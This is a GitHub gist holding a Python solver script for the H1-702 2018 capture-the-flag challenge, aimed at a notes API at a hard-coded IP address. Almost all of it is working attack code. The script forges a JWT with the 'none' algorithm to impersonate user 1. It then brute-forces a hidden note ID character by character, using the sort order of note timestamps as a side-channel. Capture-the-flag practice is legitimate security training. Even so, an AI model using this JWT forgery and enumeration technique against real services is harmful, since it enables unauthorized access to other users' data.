-
-
Save Simpsonpt/135811c5446ed16107208f8c13802b11 to your computer and use it in GitHub Desktop.
H1-702-CTF Solver.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| #-*- coding: utf-8 -*- | |
| # | |
| # h1-702-ctf.py | |
| # | |
| # Copyright 2018 @simps0n | |
| # | |
| import jwt,requests,json,time,sys | |
| #API URL | |
| url = "http://159.203.178.9" | |
| #Create JWT Token with ID 1 | |
| #jwt = jwt.encode({'id': '1'}, '', algorithm='none') | |
| jwt = "eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJpZCI6IjEifQ.t4M7We66pxjMgRNGg1RvOmWT6rLtA8ZwJeNP-S8pVak" | |
| #Epoch from the note with the FLAG! | |
| refValue = "1528911533" | |
| alphabet = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789" | |
| def bfFlag(): | |
| start = time.time() | |
| bfID = '' | |
| temp = '' | |
| toKeep = False | |
| killswitch = True | |
| while killswitch: | |
| resetNotes() | |
| for char in list(alphabet): | |
| sys.stdout.write(">> Checking Value: "+bfID+char+" ("+str(len(bfID))+")"+"\r") | |
| sys.stdout.flush() | |
| createNote(bfID+char) | |
| #Avoid time issues | |
| time.sleep(1) | |
| #Check the current ID postion After/Before and keep the last "before" char temporarily | |
| if evaluate(): | |
| temp = char | |
| toKeep = True | |
| #ID position is after the reference Epoch so the last test char (temp) is to keep | |
| elif toKeep: | |
| #Validate the if the over char is the one! | |
| killswitch = getNote(bfID+char) | |
| if not killswitch: | |
| break | |
| #Update bfID with last known "before" char and check note | |
| bfID += temp | |
| killswitch = getNote(bfID) | |
| toKeep = False | |
| break | |
| resetNotes() | |
| end = time.time() | |
| timetaken = end - start | |
| print ">> Found it in: "+str(timetaken) | |
| def evaluate(): | |
| epochs = getNotesMetadata() | |
| if epochs.index(refValue) == 0: | |
| #New note is after.. | |
| return False | |
| else: | |
| #New note is before! | |
| return True | |
| def getNotesMetadata(): | |
| headers = {'Authorization': jwt,'Accept':'application/notes.api.v1+json'} | |
| rsp = requests.get(url+'/rpc.php?method=getNotesMetadata', headers=headers) | |
| data = json.loads(rsp.content) | |
| return data['epochs'] | |
| def resetNotes(): | |
| headers = {'Authorization': jwt,'Accept':'application/notes.api.v1+json'} | |
| rsp = requests.post(url+'/rpc.php?method=resetNotes',headers=headers) | |
| data = json.loads(rsp.content) | |
| #print data | |
| def createNote(testID): | |
| headers = {'Authorization': jwt,'Accept':'application/notes.api.v2+json'} | |
| postBody = {'note':'NotTheNoteYouAreLookingFor...','id':testID} | |
| rsp = requests.post(url+'/rpc.php?method=createNote',json=postBody,headers=headers) | |
| data = json.loads(rsp.content) | |
| #print data | |
| def getNote(noteID): | |
| headers = {'Authorization': jwt,'Accept':'application/notes.api.v1+json'} | |
| rsp = requests.get(url+'/rpc.php?method=getNote&id='+noteID, headers=headers) | |
| data = json.loads(rsp.content) | |
| if not data.get('epoch') == None: | |
| if data['epoch'] == refValue: | |
| print " API Data: " + str(data) | |
| print ">> Note ID: " + noteID | |
| print ">> Note: " + data['note'] | |
| return False | |
| else: | |
| #print "Flag not Found - Try Harder!" | |
| pass | |
| return True | |
| def main(args): | |
| bfFlag() | |
| return 0 | |
| if __name__ == '__main__': | |
| import sys | |
| sys.exit(main(sys.argv)) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment